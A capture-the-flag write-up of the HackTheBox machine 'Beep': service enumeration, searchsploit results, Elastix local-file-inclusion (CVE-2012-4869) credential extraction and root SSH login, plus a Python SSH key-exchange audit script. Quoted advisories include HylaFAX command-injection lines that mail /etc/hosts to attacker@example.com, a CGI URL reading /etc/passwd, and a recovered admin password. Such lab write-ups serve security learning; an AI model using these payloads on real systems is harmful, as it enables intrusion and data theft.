Beep

# ENUMERATION

NMAP:

- 22: OpenSSH 4.3 (protocol 2.0)
- 25: Postfix smtpd
- 80: Apache httpd 2.2.3
- 110: Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
- 111: rpcbind 2 (RPC #100000)
- 143: Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
- 443: ssl/https?
- 877: 1 (RPC #100024)
- 993: Cyrus imapd
- 995: Cyrus pop3d
- 3306: MySQL (unauthorized)
- 4190: Cyrus timsieved 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4 (included w/ cyrus imap)
- 4445: upnotifyp?
- 4559: HylaFAX 4.3.10
- 5038: Asterisk Call Manager 1.1
- 10000: MiniServ 1.570 (Webmin httpd)

SEARCHSPLOIT:

kali@kali:~$ searchsploit imapd
------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                     | Path
------------------------------------------------------------------ ---------------------------------
Cyrus imapd 2.2.4 < 2.2.8 - 'imapmagicplus' Remote Overflow        | linux/remote/903.c
------------------------------------------------------------------ ---------------------------------

kali@kali:~$ searchsploit hylafax
------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                     | Path
------------------------------------------------------------------ ---------------------------------
Hylafax 4.0 pl2 Faxsurvey - Remote Command Execution               | unix/remote/20462.txt
Hylafax 4.1.x - HFaxD Format String                                | linux/remote/23371.c
Hylafax 4.1/4.2 (Multiple Scripts) - Remote Command Execution      | linux/remote/27032.txt
------------------------------------------------------------------ ---------------------------------

- the Hylafax ones seem to use the fax service itself (makes sense) as the exploit path

================== EXPLANATION Hylafax 27032.txt ======================

kali@kali:/usr/share/exploitdb/exploits/linux/remote$ cat 27032.txt
source: https://www.securityfocus.com/bid/16151/info

HylaFAX is vulnerable to multiple arbitrary command-execution vulnerabilities. This issue is due to a failure in the application to properly sanitize user-supplied input.

These vulnerabilities allow an attacker to execute arbitrary commands in the context of the affected application. Successful exploitation may facilitate a compromise of the underlying system.

sendfax -d "411;number=\`cat /etc/hosts\`" /etc/hosts
sendfax -f "\`cat /etc/hosts|mail -s hosts attacker@example.com\` " -d 411 /etc/hosts
sendfax -d "@411\";cat /etc/hosts|mail -s hosts attacker@example.com;" /etc/hosts

================== EXPLANATION Hylafax 20462.txt ===================

kali@kali:/usr/share/exploitdb/exploits/unix/remote$ cat 20462.txt
source: https://www.securityfocus.com/bid/2056/info

Hylafax is a popular fax server software package designed to run on multiple UNIX operating systems. Unpatched versions of Hylafax ship with an insecure script, faxsurvey, which allows remote command execution with the privileges of the web server process. This can be exploited simply by passing the command as a parameter to the script - see exploit.

Consequences could include web site defacements, exploiting locally accessible vulnerabilities to gain further privileges, etc.

http://target.host/cgi-bin/faxsurvey?/bin/cat%20/etc/passwd

# ENUMERATION

Found a Webmin install on port 10000 - the page source revealed nothing useful.

# SEARCHSPLOIT

kali@kali:/usr/share/exploitdb/exploits/unix/remote$ searchsploit webmin
------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                     | Path
------------------------------------------------------------------ ---------------------------------
DansGuardian Webmin Module 0.x - 'edit.cgi' Directory Traversal    | cgi/webapps/23535.txt
phpMyWebmin 1.0 - 'target' Remote File Inclusion                   | php/webapps/2462.txt
phpMyWebmin 1.0 - 'window.php' Remote File Inclusion               | php/webapps/2451.txt
Webmin - Brute Force / Command Execution                           | multiple/remote/705.pl
webmin 0.91 - Directory Traversal                                  | cgi/remote/21183.txt
Webmin 0.9x / Usermin 0.9x/1.0 - Access Session ID Spoofing        | linux/remote/22275.pl
Webmin 0.x - 'RPC' Privilege Escalation                            | linux/remote/21765.pl
Webmin 0.x - Code Input Validation                                 | linux/local/21348.txt
Webmin 1.5 - Brute Force / Command Execution                       | multiple/remote/746.pl
Webmin 1.5 - Web Brute Force (CGI)                                 | multiple/remote/745.pl
Webmin 1.580 - '/file/show.cgi' Remote Command Execution (Metasploit) | unix/remote/21851.rb
Webmin 1.850 - Multiple Vulnerabilities                            | cgi/webapps/42989.txt
Webmin 1.900 - Remote Command Execution (Metasploit)               | cgi/remote/46201.rb
Webmin 1.910 - 'Package Updates' Remote Command Execution (Metasploit) | linux/remote/46984.rb
Webmin 1.920 - Remote Code Execution                               | linux/webapps/47293.sh
Webmin 1.920 - Unauthenticated Remote Code Execution (Metasploit)  | linux/remote/47230.rb
Webmin 1.x - HTML Email Command Execution                          | cgi/webapps/24574.txt
Webmin < 1.290 / Usermin < 1.220 - Arbitrary File Disclosure (Perl) | multiple/remote/2017.pl
Webmin < 1.290 / Usermin < 1.220 - Arbitrary File Disclosure (PHP) | multiple/remote/1997.php
------------------------------------------------------------------ ---------------------------------

================== EXPLANATION Webmin 23535.txt ===================

kali@kali:/usr/share/exploitdb/exploits$ cat cgi/webapps/23535.txt
source: https://www.securityfocus.com/bid/9394/info

A problem has been identified in the handling of input by scripts packaged with the DansGuardian Webmin Module. Because of this, it is possible for a remote attacker to gain access to potentially sensitive information.

https://www.example.com:10000/dansguardian/edit.cgi?file=[FILE]

# ENUMERATION

Googled Elastix, which was the first page that showed up...

- CVE N/A - https://www.exploit-db.com/exploits/37637
- CVE-2012-4869 - https://www.exploit-db.com/exploits/18650

# EXPLOIT

The first one (CVE N/A) didn't do anything... only errors.

The second one (CVE-2012-4869) revealed a massive amount of data. I pasted that into a text file and ran a sed command to break it into one line per '#':

sed 's/#/&\n/g' elastix_LFI.txt

# FINDING

AMPMGRUSER=admin
AMPMGRPASS=jEhdIekWmdjE

These credentials worked on the login page.

I tried to SSH into the machine using the credentials, but no joy. Looks like the server only offers legacy key exchange methods that my client refuses by default.

kali@kali:~/HTB/RETIRED/Beep$ ssh admin@10.10.10.7
Unable to negotiate with 10.10.10.7 port 22: no matching key exchange method found. Their offer: diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1

Googled the error and got some legacy SSH instructions. Then changed the command to:

$ ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 root@10.10.10.7

There were some other passwords within that file, but they didn't work. Neither did trying to SSH with username admin. Root with the password above worked. PWND!
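The key exchange failure above is also a useful hardening signal: a host whose entire KEX offer is SHA-1 based is one that forces every client to re-enable deprecated algorithms. As an added example (not part of the writeup), this Python script parses the OpenSSH client error and classifies the offered methods; the LEGACY_KEX set is my own classification and the sample error string is constructed from the message shown above.

```python
import re

# KEX methods that current OpenSSH clients disable by default
# (SHA-1 based, or the 1024-bit group1). Assumption: this is my own
# classification for the example, not a list from the writeup.
LEGACY_KEX = {
    "diffie-hellman-group1-sha1",
    "diffie-hellman-group14-sha1",
    "diffie-hellman-group-exchange-sha1",
}

OFFER_RE = re.compile(
    r"no matching key exchange method found\. Their offer: (\S+)"
)


def parse_offer(error_line: str) -> list[str]:
    """Extract the server's offered KEX list from an OpenSSH client error."""
    m = OFFER_RE.search(error_line)
    if not m:
        return []
    return [alg for alg in m.group(1).split(",") if alg]


def audit_kex(offered: list[str]) -> dict:
    """Split an offered KEX list into legacy and acceptable methods."""
    legacy = [a for a in offered if a in LEGACY_KEX]
    modern = [a for a in offered if a not in LEGACY_KEX]
    return {
        "legacy": legacy,
        "modern": modern,
        # True when the host leaves clients no choice but a legacy method.
        "legacy_only": bool(offered) and not modern,
    }


# Constructed sample: the client error seen against 10.10.10.7 above.
SAMPLE_ERROR = (
    "Unable to negotiate with 10.10.10.7 port 22: no matching key exchange "
    "method found. Their offer: diffie-hellman-group-exchange-sha1,"
    "diffie-hellman-group14-sha1,diffie-hellman-group1-sha1"
)

if __name__ == "__main__":
    print(audit_kex(parse_offer(SAMPLE_ERROR)))
```

A `legacy_only` result is the case that needs `-oKexAlgorithms=+...` on the client; the server-side fix is updating OpenSSH (4.3 here) so a modern method can be offered, rather than re-enabling group1 on every client.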